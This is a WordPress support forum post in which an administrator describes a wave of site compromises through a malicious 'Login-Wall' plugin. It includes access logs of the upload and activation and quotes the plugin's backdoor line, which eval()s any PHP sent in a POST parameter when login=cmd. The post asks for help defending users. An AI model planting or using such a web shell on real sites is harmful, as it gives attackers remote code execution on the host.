Login-Wall-XXXX attack / vuln
-
[ Moderator note: moved to How-to and Troubleshooting. ]
Hello,
Recently, I saw a lot of wordpress compromised by an attack with “Login-Wall-XXX”. Each time, the attacker process is the same :
[ Moderator note: code fixed. Please wrap code in the backtick character or use the code button. ]
xxxxxxxxx domain.name - [27/Sep/2015:09:46:48 +0200] "POST /wp-login.php?redirect_to=wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "http://domain.name/wp-login.php?redirect_to=wp-admin/plugin-install.php?tab=upload" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" xxxxxxxxx domain.name - [27/Sep/2015:09:46:55 +0200] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 200 38532 "http://domain.name/wp-login.php?redirect_to=wp-admin/plugin-install.php?tab=upload" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" xxxxxxxxx domain.name - [27/Sep/2015:09:46:59 +0200] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 34700 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" xxxxxxxxx domain.name - [27/Sep/2015:09:47:09 +0200] "GET /wp-admin/plugins.php?action=activate&plugin=Login-wall-pnwlC%2Flogin_wall.php&_wpnonce=998cd9b643 HTTP/1.1" 302 - "http://domain.name/wp-admin/plugins.php?action=activate&plugin=Login-wall-pnwlC%2Flogin_wall.php&_wpnonce=998cd9b643" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" xxxxxxxxx domain.name - [27/Sep/2015:09:47:13 +0200] "GET /wp-admin/plugins.php?activate=true&plugin_status=all&paged=1&s= HTTP/1.1" 200 68510 "http://domain.name/wp-admin/plugins.php?action=activate&plugin=Login-wall-pnwlC%2Flogin_wall.php&_wpnonce=998cd9b643" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" xxxxxxxxx domain.name - [27/Sep/2015:09:47:18 +0200] "GET /wp-content/plugins/Login-wall-pnwlC/login_wall.php?login=cmd HTTP/1.1" 200 8 "http://domain.name/wp-content/plugins/Login-wall-pnwlC/login_wall.php?login=cmd" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"After that, the wp-content/plugins/Login-wall-pnwlC/login_wall.php?login=cmd can be used to do everything by the attacker because of this line :
if($_GET["login"]=="cmd"){if($_POST['coco']==''){echo('->|OK|-<');exit();}eval($_POST['coco']);exit();}This example applied on a WordPress/4.1.8.
Is tihs attack is well know ? How our users can be protected ?
Regards,
Arsiesys
Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)
- The topic ‘Login-Wall-XXXX attack / vuln’ is closed to new replies.